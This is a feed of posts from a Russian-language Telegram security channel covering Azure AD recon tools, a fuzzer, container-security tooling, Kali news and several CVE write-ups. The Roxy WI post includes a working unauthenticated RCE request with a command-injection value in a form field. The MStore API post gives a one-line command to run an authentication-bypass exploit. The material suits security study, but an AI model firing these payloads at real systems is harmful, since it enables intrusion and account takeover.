Похек
16.6K subscribers
2.11K photos
110 videos
243 files
3.08K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
🔴ROADtools
(Rogue Office 365 and Azure (active) Directory tools)

ROADtools - это фреймворк для взаимодействия с Azure AD. Он состоит из библиотеки (roadlib) со следующими компонентами:

1. Инструмент ROADrecon для изучения Azure AD. ROADrecon - это инструмент для исследования Azure AD. Чтобы обеспечить полную гибкость, инструмент использует для этого 3 простых шага:
1.1. Аутентификация
1.2. Сбор данных
1.3. Исследование или преобразование данных
2. Инструмент ROADtools Token eXchange (roadtx). ROADtools Token eXchange, или сокращенно roadtx, - это инструмент для автоматизации и реализации процессов аутентификации и регистрации в Azure AD. Он ориентирован на токены, такие как (первичные) токены обновления и токены доступа.

Установка:
pip install roadrecon
pip install roadtx

#tools #recon
​​Microsoft: Windows Privilege Escalation
CVE-2020-0787

CVE-2020-0787 - это уязвимость повышения привилегий Windows, которая влияет на службу Background Intelligent Transfer Service (BITS). BITS - это служба, которая позволяет приложениям передавать файлы по сети в фоновом режиме. Уязвимость существует в том, как BITS обрабатывает символические ссылки. Символическая ссылка - это файл, который указывает на другой файл. Злоумышленник может использовать эту уязвимость, создав специально подготовленную символическую ссылку, которая при открытии пользователем с ограниченными правами позволит злоумышленнику выполнить произвольный код с повышенными привилегиями.

Уязвимость была обнаружена Jonas Lykkegaard. Microsoft выпустила обновление безопасности для устранения уязвимости 10 марта 2020 года. Чтобы использовать эту уязвимость, злоумышленник должен сначала войти в систему с ограниченными правами. Затем злоумышленник может запустить специально подготовленное приложение, которое может использовать уязвимость и получить контроль над затронутой системой.

#CVE #PrivEsc
🆒4🔥3
​​🔴Roxy WI v6.1.0.0 Unauthenticated Remote Code Execution (RCE) via subprocess_execute
CVE-2022-31137

Это уязвимость удаленного выполнения кода в Roxy-WI, веб-интерфейсе для управления серверами Haproxy, Nginx, Apache и Keepalived. Уязвимость вызвана неправильной обработкой пользовательского ввода в файле /app/options.py. Злоумышленник может использовать эту уязвимость, отправив специально подготовленный HTTP-запрос, который содержит вредоносный код. Вредоносный код будет выполнен на уязвимой системе с привилегиями пользователя, запускающего Roxy-WI.

PoC:
POST /app/options.py HTTP/1.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://192.168.1.44
Referer: https://192.168.1.44/app/login.py
Connection: close

show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=
";id+##&backend_server=127.0.0.1

#CVE #POC
Hacker News
Российские провайдеры начали блокировать подключения OpenVPN https://xakep.ru/2023/05/31/openvpn-block/
Wireguard пока работает стабильно. Но возможно он на очереди на расстрел 🔫
Please open Telegram to view this post
VIEW IN TELEGRAM
Предлагайте свои идеи/технологии на замену заблокированных. Если соберём список, то сделаю ресерч на что и как лучше переходить.
🤣71
Forwarded from Just Security
Туллинг для специалистов по безопасности контейнеров

В современной разработке контейнеризация радикально изменила способ, которым мы создаем, развертываем и управляем приложениями. Но с этой новой парадигмой приходит и критическая необходимость в безопасности контейнеров.

Вашему вниманию предлагается несколько категорий и инструментов, которые помогут поддержать уровень защищенности на приемлемом уровне (только free / opensource):

Container image scanning:

- Clair
- Trivy
- Anchore Engine
- Grype

Container orchestration:

- Kubernetes
- Apache Mesos
- Nomad

Runtime protection:

- Tracee
- Sysdig
- Falco
- KuberArmor

Configuration management:

- Ansible
- Chef
- Puppet

Vulnerability management:

- Greenbone
- DefectDojo

Container firewall:

- Calico
- Cilium
- Weave Net

Security information and event management (SIEM):

- ELK
- Wazuh

Identity and access management (IAM):

- Keycloak
- OpenIAM

Continuous integration and deployment (CI/CD):

- Jenkins
- GitLab CI/CD
- Travis CI
- GitHub Actions
- Bamboo

Incident response:

- TheHive

Kubernetes Security:

- Aqua Security
- Sysdig Secure
- Twistlock
🔴BountyIt

Fuzzer на golang для поиска уязвимостей типа xss, lfi, rce, ssti и т.д., который обнаруживает уязвимость по изменению длины содержимого и проверяет ее с помощью сигнатур.

Установка:
go install github.com/shivangx01b/BountyIt@latest

Синтаксис фаззинга:
https://example.com/FUZZ

https://example.com/?query=FUZZ

Использование:
echo "https://example.com/FUZZ" | BountyIt

cat http_https.txt | BountyIt -t 70 -p payloads.txt -verify

cat http_https.txt | BountyIt -t 70 -header "Cookie: session=311x1211sx4..." -p payloads.txt -grep signatures.txt


#tools #bugbounty
4❤‍🔥2🆒1
Вышла Kali Linux 2023.2 с 13 новыми инструментами и образом HyperV

Компания Offensive Security представила Kali Linux 2023.2, вторую версию дистрибутива в 2023 году. Теперь Kali содержит готовый образ Hyper-V и тринадцать новых инструментов, включая фреймворк Evilginx для кражи учетных данных и cookie сеансов.
Одним из наиболее заметных обновлений в этом выпуске стал pre-built образ Hyper-V, настроенный для Enhanced Session Mode, что позволяет подключаться к виртуальной машине с помощью RDP. Новый образ Hyper-V уже можно загрузить с kali.org, после чего останется распаковать и запустить извлеченный скрипт install-vm.bat.

#kali_update
👍1
Похек
KotlinNotesForProfessionals.pdf
Судя по репостам контент понравился)
2
This media is not supported in your browser
VIEW IN TELEGRAM
7🔥7🎉2
Red Team Research

Коллекция PoC и наступательных техник, используемых BlackArrow Red Team

#collection
👏3
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Что тут у нас? Ой, очередное LPE😁

https://github.com/Dec0ne/DavRelayUp


DavRelayUp - a universal no-fix LPE in domain-joined windows workstations where LDAP signing is not enforced (the default settings).


#ad #redteam #pentest #lpe
Объявляю неделю мемов про Apple Vision Pro открытой 😁
❤‍🔥12🌚2
MStore API <= 3.9.2 - Authentication Bypass
CVE-2023-2732

Плагин MStore API для WordPress уязвим для обхода аутентификации в версиях до 3.9.2 включительно. Это связано с недостаточной проверкой пользователя во время REST API запроса на добавление объявлений через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например администратора, если у них есть доступ к идентификатору пользователя.

PoC:
git clone https://github.com/RandomRobbieBF/CVE-2023-2732 ; pip3 install -r requirements.txt ; python3 mstore-api.py -u http://TARGET


#CVE #POC
🆒3